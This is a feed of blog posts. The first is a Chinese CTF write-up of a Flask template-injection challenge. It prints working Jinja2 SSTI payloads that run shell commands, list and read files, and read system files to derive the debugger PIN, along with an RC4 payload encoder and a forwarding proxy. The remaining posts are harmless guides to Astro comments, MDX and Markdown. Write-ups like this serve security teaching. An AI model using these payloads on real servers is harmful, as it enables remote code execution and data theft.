展开/app/app.py这个源码

File "/app/app.py", line 35, in secret
    if(secret==None):
        return 'Tell me your secret.I will encrypt it so others can\'t see'
    rc=rc4_Modified.RC4("HereIsTreasure")   #解密
    deS=rc.do_crypt(secret)
    a=render_template_string(safe(deS))
    if 'ciscn' in a.lower():
        return 'flag detected!'
      return a

一个rc4加密，如果secret为空就返回Tell me your secret.I will encrypt it so others can\'t see不为空就调用safe处理rc4编码后的值，返回字符串给a，如果a的小写包含ciscn则返回flag被删了，其余返回a，这里把rce的密钥也暴露出来了

jinjia的payload
#展示路径下的文件
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{c.__init__.__globals__['__builtins__']['__import__']('os').listdir('/')}}{% endif %}{% endfor %}

#读取文件
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag.txt').read()")}}{% endif %}{% endfor %}

{{cycler.next.__globals__.__builtins__.__import__('os').popen('nl /*').read()}}

锤锤AI拿个RC4加密脚本，我们知道，要将payload加密以后才能传参过去。

def initialize_rc4_key(key):
    key_length = len(key)
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % key_length]) % 256
        S[i], S[j] = S[j], S[i]
    return S

def rc4_encrypt(key, plaintext):
    S = initialize_rc4_key(key)
    i = j = 0
    ciphertext = []
    for char in plaintext:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        k = S[(S[i] + S[j]) % 256]
        ciphertext.append(chr(ord(char) ^ k))
    return ''.join(ciphertext)

def main():
    key = input("请输入密钥: ")
    plaintext = input("请输入要加密的字符串: ")
    encrypted_text = rc4_encrypt(key, plaintext)
    print("加密后的字符串: ", encrypted_text)

if __name__ == "__main__":
    main()

ok，接下来我们玩点骚的，继续锤AI，在本地flask起一个，POST交data，rc4加密后发给题目的url，将题目url回显到本地。

from flask import Flask, request, jsonify
import urllib.parse
import requests

app = Flask(__name__)

# RC4加密算法
def rc4_encrypt(key, data):
    S = list(range(256))
    j = 0
    out = []
    # 初始化S盒
    for i in range(256):
        j = (j + S[i] + ord(key[i % len(key)])) % 256
        S[i], S[j] = S[j], S[i]
    # 生成密钥流并加密
    i = j = 0
    for char in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(chr(ord(char) ^ S[(S[i] + S[j]) % 256]))
    return ''.join(out)

@app.route('/', methods=['POST', 'GET'])
def handle_request():
    if request.method == 'POST':
        # 获取POST请求中的数据
        data = request.form.get('data')
        if data:
            # 使用RC4加密数据
            encrypted_data = rc4_encrypt('HereIsTreasure', data)
            # 构造GET请求的URL
            url = f'http://8bac6987-76e0-4569-8a95-5e53c13fb530.node5.buuoj.cn:81/secret?secret={urllib.parse.quote(encrypted_data)}'
            # 发送GET请求
            response = requests.get(url)
            # 返回GET请求的响应内容
            return response.text, response.status_code
        else:
            return jsonify({'status': 'error', 'message': 'No data provided'}), 400
    elif request.method == 'GET':
        # 获取GET请求中的secret参数
        secret = request.args.get('secret')
        if secret:
            # 处理GET请求（根据实际情况添加处理逻辑）
            # 这里我们只是返回接收到的secret
            return f'Received secret: {secret}', 200
        else:
            return 'No secret provided', 200

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80, debug=False)

之后就是常见的SSTI了，直接上fenjing梭哈就完了，查看app.py的时候发现报错了，应该是python2的原因，也可以用反弹shell，计算pin码

data={% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/sys/class/net/eth0/address','r').read() }}{% endif %}{% endfor %}
92:ab:45:07:68:11

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#This .py gives flask ssti loophole
from flask import Flask
from flask import render_template
from flask import request
from flask import render_template_string
import rc4_Modified

app=Flask(__name__)

@app.route('/')
def hello():
    return 'Welcome To Find Secret'

@app.route('/robots.txt')
def robots():
    return 'It is Android ctf'

@app.route('/secret',methods=['GET','POST'])
def secret():
    def safe(s):
        black=['class','mro','subclasses','read','args','form','write', 'mro',  '<', '>', '|', 'join' 'os', 'sys', 'pop', 'del', 'rm', 'eval', 'exec', 'ls', 'cat', ';', '&&', 'catch_warnings', 'func_globals', 'pickle', 'import', 'subprocess', 'commands', 'input', 'execfile', 'reload', 'compile', 'execfile', 'kill', 'func_code' ]
        for i in black:
            if i in s:
                return '\''+i+'\' is not allowed. Secret is '+s
        return s
    secret=request.args.get('secret')
    if(secret==None):
        return 'Tell me your secret.I will encrypt it so others can\'t see'
    rc=rc4_Modified.RC4("HereIsTreasure")   #解密
    deS=rc.do_crypt(secret)

    a=render_template_string(safe(deS))

    if 'ciscn' in a.lower():
        return 'flag detected!'
    return a

if __name__=='__main__':
    app.run(
        debug=True,
        host="0.0.0.0"
    )

# -*- coding: utf-8 -*-
class RC4:
    def __init__(self,public_key = None):
        if not public_key:
            public_key = 'none_public_key'
        self.public_key = public_key
        self.index_i = 0
        self.index_j = 0
        self._init_box()

    def _init_box(self):
        """
        初始化 置换盒
        """
        self.Box = [i for i in range(256)]
        key_length = len(self.public_key)
        j = 0
        for i in range(256):
            index = ord(self.public_key[(i % key_length)])
            j = (j + self.Box[i] + index ) % 256
            self.Box[i],self.Box[j] = self.Box[j],self.Box[i]
        # for i in range(256):

    def do_crypt(self,string):
        """
        加密/解密
        string : 待加/解密的字符串
        """

        out = []
        test=[]
        #print(len(string))
        for s in string:
            self.index_i = (self.index_i + 1) % 256
            self.index_j = (self.index_j + self.Box[self.index_i]) % 256
            self.Box[self.index_i], self.Box[self.index_j] = self.Box[self.index_j],  self.Box[self.index_i]

            r = (self.Box[self.index_i] + self.Box[self.index_j]) % 256
            R = self.Box[r] # 生成伪随机数
            tmp=ord(s)^R
            test.append(tmp)
            out.append(chr(tmp))
        #print(test)
        #print(len(test))
        return ''.join(out)

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: http://pinesawfly.top/blog/ciscn2019-%E5%8D%8E%E4%B8%9C%E5%8D%97%E8%B5%9B%E5%8C%BAdouble-secret/

Adding Comment Systems to Frosti

pine的个人博客 — Mon, 14 Apr 2025 16:00:00 GMT

Introduction

One of the essential features of any blog is the ability for readers to engage with your content through comments. While Frosti provides an excellent foundation for your Astro-based blog, adding a comment system requires a few additional steps. This guide will walk you through integrating the Waline comment system into your Frosti blog.

Static sites like those built with Astro don't have built-in comment systems since they lack server-side processing. However, we can use third-party comment services that handle the backend for us, while we integrate their frontend components into our site.

Creating Comment Components in Astro

Before diving into a specific comment system, let's understand how to create and use components in Astro. We'll create a reusable component that can be easily added to any page.

Component Structure

We'll create our comment component in the src/components/comments directory. First, let's ensure this directory exists:

mkdir -p src/components/comments

Integrating Waline

Waline is a simple, safe, and feature-rich comment system with backend and frontend separation. It is highly customizable and easy to set up.

Step 1: Set Up Waline Backend

Before adding Waline to your site, you need to set up the backend:

Create a LeanCloud application to store your comments.
Deploy the Waline server to Vercel or another hosting platform.

Follow the official Waline guide to set up your backend service. After deploying, you'll get a server URL that you will need for the frontend component.

Step 2: Create the Waline Component

Let's create a reusable Waline component:

touch src/components/comments/Waline.astro

Add the following code to this component:

---
interface Props {
  serverURL: string;
  lang?: string;
  dark?: string;
  emoji?: string[];
  meta?: string[];
  requiredMeta?: string[];
  reaction?: boolean;
  pageview?: boolean;
}

const {
  serverURL,
  lang = "en",
  dark = "html[data-theme-type='dark']",
  emoji = ["https://unpkg.com/@waline/emojis@1.1.0/weibo", "https://unpkg.com/@waline/emojis@1.1.0/bilibili"],
  meta = ["nick", "mail", "link"],
  requiredMeta = [],
  reaction = false,
  pageview = false,
} = Astro.props;
---

<div id="waline-container"></div>

<link rel="stylesheet" href="https://unpkg.com/@waline/client@v3/dist/waline.css" />

<script
  type="module"
  define:vars={{
    serverURL,
    lang,
    dark,
    emoji,
    meta,
    requiredMeta,
    reaction,
    pageview,
  }}
>
  import { init } from "https://unpkg.com/@waline/client@v3/dist/waline.js";

  async function initWaline() {
    const container = document.querySelector("#waline-container");
    if (!container) return;

    init({
      el: "#waline-container",
      serverURL,
      path: location.pathname,
      lang,
      dark,
      emoji,
      meta,
      requiredMeta,
      reaction,
      pageview,
    });
  }

  document.addEventListener("astro:page-load", () => {
    initWaline();
  });

  if (document.readyState !== "loading") {
    initWaline();
  } else {
    document.addEventListener("DOMContentLoaded", initWaline);
  }
</script>

<style>
  #waline-container {
    margin-top: 2rem;
    margin-bottom: 2rem;
  }
</style>

Step 3: Using the Waline Component

You can now use the Waline component in your Astro pages or layouts. Here's how to add it to your blog post template:

---
// In your blog post layout file
import Waline from "../../components/comments/Waline.astro";
// Other imports and frontmatter...
---

<!-- Your blog post content -->
<article>
  <slot />
</article>

<!-- Add the comment section -->
<section class="comments">
  <h2>Comments</h2>
  <Waline serverURL="https://your-waline-server.vercel.app" />
</section>

Replace "https://your-waline-server.vercel.app" with your actual Waline server URL.

Troubleshooting

Common Issues

Comments not displaying: Make sure your serverURL is correctly set and accessible.
CSS issues: Ensure that the Waline stylesheet is properly loaded.
Deployment issues: If your server is on Vercel, check the environment variables and deployment logs.

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: http://pinesawfly.top/blog/adding-comment-systems/

Using mdx in Frosti

pine的个人博客 — Thu, 11 Jul 2024 16:00:00 GMT

import Collapse from "../../components/mdx/Collapse.astro"; import Diff from "../../components/mdx/Diff.astro"; import Error from "../../components/mdx/Error.astro"; import Info from "../../components/mdx/Info.astro"; import Kbd from "../../components/mdx/Kbd.astro"; import Success from "../../components/mdx/Success.astro"; import Warning from "../../components/mdx/Warning.astro"; import TimeLine from "../../components/mdx/TimeLine.astro"; import LinkCard from "../../components/mdx/LinkCard.astro";

Preface

This article describes how to use the components provided by Frosti in mdx to realize the functions that can't be realized by normal md.

Main text

Getting started

First you need to create an mdx file, which is as simple as changing the extension to .mdx.

Introducing

The components provided by Frosti are placed in the /mdx folders. Write something under the document properties (frontmatter):

import Collapse from "../../components/mdx/Collapse.astro";
import Diff from "../../components/mdx/Diff.astro";
import Error from "../../components/mdx/Error.astro";
import Info from "../../components/mdx/Info.astro";
import Kbd from "../../components/mdx/Kbd.astro";
import Success from "../../components/mdx/Success.astro";
import Warning from "../../components/mdx/Warning.astro";
import TimeLine from "../../components/mdx/TimeLine.astro";
import LinkCard from "../../components/mdx/LinkCard.astro";

Example

Collapse

This is the hidden content!

<Collapse title="This is an example text.">
  This is the hidden content!
</Collapse>

Diff

<Diff l="/image/l.png" r="/image/r.png" />

Error

Maybe something went wrong?

<Error>Maybe something went wrong? </Error>

Warning

Hey! Watch out for potholes!

<Warning>Hey! Watch out for potholes! </Warning>

Message

It's just a message.

<Info>It's just a message. </Info>

Success

Congratulations on your successful deployment!

<Success>Congratulations on your successful deployment! </Success>

Kbd

Ctrl + C to copy the text.

<Kbd>Ctrl</Kbd> + <Kbd>C</Kbd> to copy the text.

TimeLine

<TimeLine
  items={[
    { year: "1984", event: "First Macintosh computer" },
    { year: "1998", event: "iMac" },
    { year: "2001", event: "iPod" },
    { year: "2007", event: "iPhone" },
    { year: "2015", event: "Apple Watch" },
  ]}
/>

LinkCard

<LinkCard
  title="Frosti"
  desc="My blog project!"
  url="https://github.com/EveSunMaple/Frosti"
  img="/logo.png"
/>

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: http://pinesawfly.top/blog/frosti-mdx/

Markdown Style Guide

pine的个人博客 — Sun, 30 Jun 2024 16:00:00 GMT

Here is a sample of some basic Markdown syntax that can be used when writing Markdown content in Astro.

Headings

The following HTML <h1>—<h6> elements represent six levels of section headings. <h1> is the highest section level while <h6> is the lowest.

H1

H2

H3

H4

H5

H6

Paragraph

Xerum, quo qui aut unt expliquam qui dolut labo. Aque venitatiusda cum, voluptionse latur sitiae dolessi aut parist aut dollo enim qui voluptate ma dolestendit peritin re plis aut quas inctum laceat est volestemque commosa as cus endigna tectur, offic to cor sequas etum rerum idem sintibus eiur? Quianimin porecus evelectur, cum que nis nust voloribus ratem aut omnimi, sitatur? Quiatem. Nam, omnis sum am facea corem alique molestrunt et eos evelece arcillit ut aut eos eos nus, sin conecerem erum fuga. Ri oditatquam, ad quibus unda veliamenimin cusam et facea ipsamus es exerum sitate dolores editium rerore eost, temped molorro ratiae volorro te reribus dolorer sperchicium faceata tiustia prat.

Itatur? Quiatae cullecum rem ent aut odis in re eossequodi nonsequ idebis ne sapicia is sinveli squiatum, core et que aut hariosam ex eat.

Images

Syntax

![Alt text](./full/or/relative/path/of/image)

Output

Blockquotes

The blockquote element represents content that is quoted from another source, optionally with a citation which must be within a footer or cite element, and optionally with in-line changes such as annotations and abbreviations.

Blockquote without attribution

Syntax

> Tiam, ad mint andaepu dandae nostion secatur sequo quae.
> **Note** that you can use _Markdown syntax_ within a blockquote.

Output

Tiam, ad mint andaepu dandae nostion secatur sequo quae. Note that you can use Markdown syntax within a blockquote.

Blockquote with attribution

Syntax

> Don't communicate by sharing memory, share memory by communicating.<br>
> — <cite>Rob Pike[^1]</cite>

Output

Don't communicate by sharing memory, share memory by communicating.
— Rob Pike[^1]

[^1]: The above quote is excerpted from Rob Pike's talk during Gopherfest, November 18, 2015.

Tables

Syntax

| Italics   | Bold     | Code   |
| --------- | -------- | ------ |
| _italics_ | **bold** | `code` |

Output

Italics	Bold	Code
italics	bold	`code`

Code Blocks

Syntax

we can use 3 backticks ``` in new line and write snippet and close with 3 backticks on new line and to highlight language specific syntac, write one word of language name after first 3 backticks, for eg. html, javascript, css, markdown, typescript, txt, bash

```cpp
#include <bits/stdc++.h>
using namespace std;
const int N = 1e5 + 5;
int n, k, a[N];
long long ans;
vector<int> v[N];
int main()
{
    scanf("%d%d", &n, &k);
    for (int i = 1; i <= n; i++)
    {
        scanf("%d", &a[i]);
        v[i % k].push_back(a[i]);
    }
    for (int i = 0; i < k; i++)
        sort(v[i].rbegin(), v[i].rend());
    for (int i = 0; i < k; i++)
    {
        for (int j = 0; j + 1 < v[i].size(); j += 2)
        {
            ans += v[i][j] + v[i][j + 1];
        }
    }
    printf("%lld\n", ans);
    return 0;
}
```

Output

#include <bits/stdc++.h>
using namespace std;
const int N = 1e5 + 5;
int n, k, a[N];
long long ans;
vector<int> v[N];
int main()
{
    scanf("%d%d", &n, &k);
    for (int i = 1; i <= n; i++)
    {
        scanf("%d", &a[i]);
        v[i % k].push_back(a[i]);
    }
    for (int i = 0; i < k; i++)
        sort(v[i].rbegin(), v[i].rend());
    for (int i = 0; i < k; i++)
    {
        for (int j = 0; j + 1 < v[i].size(); j += 2)
        {
            ans += v[i][j] + v[i][j + 1];
        }
    }
    printf("%lld\n", ans);
    return 0;
}

List Types

Ordered List

Syntax

1. First item
2. Second item
3. Third item

Output

First item
Second item
Third item

Unordered List

Syntax

- List item
- Another item
- And another item

Output

List item
Another item
And another item

Nested list

Syntax

- Fruit
  - Apple
  - Orange
  - Banana
- Dairy
  - Milk
  - Cheese

Output

Fruit
- Apple
- Orange
- Banana
Dairy
- Milk
- Cheese

Other Elements

Syntax

<abbr title="Graphics Interchange Format">GIF</abbr> is a bitmap image format.

H<sub>2</sub>O

X<sup>n</sup> + Y<sup>n</sup> = Z<sup>n</sup>

Press <kbd>CTRL</kbd>+<kbd>ALT</kbd>+<kbd>Delete</kbd> to end the session.

Most <mark>salamanders</mark> are nocturnal, and hunt for insects, worms, and other small creatures.

Output

GIF is a bitmap image format.

H₂O

Xⁿ + Yⁿ = Zⁿ

Press CTRL+ALT+Delete to end the session.

Most salamanders are nocturnal, and hunt for insects, worms, and other small creatures.

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: http://pinesawfly.top/blog/markdown-style-guide/

Using MDX

pine的个人博客 — Fri, 01 Jul 2022 16:00:00 GMT

This theme comes with the @astrojs/mdx integration installed and configured in your astro.config.mjs config file. If you prefer not to use MDX, you can disable support by removing the integration from your config file.

Why MDX?

MDX is a special flavor of Markdown that supports embedded JavaScript & JSX syntax. This unlocks the ability to mix JavaScript and UI Components into your Markdown content for things like interactive charts or alerts.

If you have existing content authored in MDX, this integration will hopefully make migrating to Astro a breeze.

Example

Here is how you import and use a UI component inside of MDX.
When you open this page in the browser, you should see the clickable button below.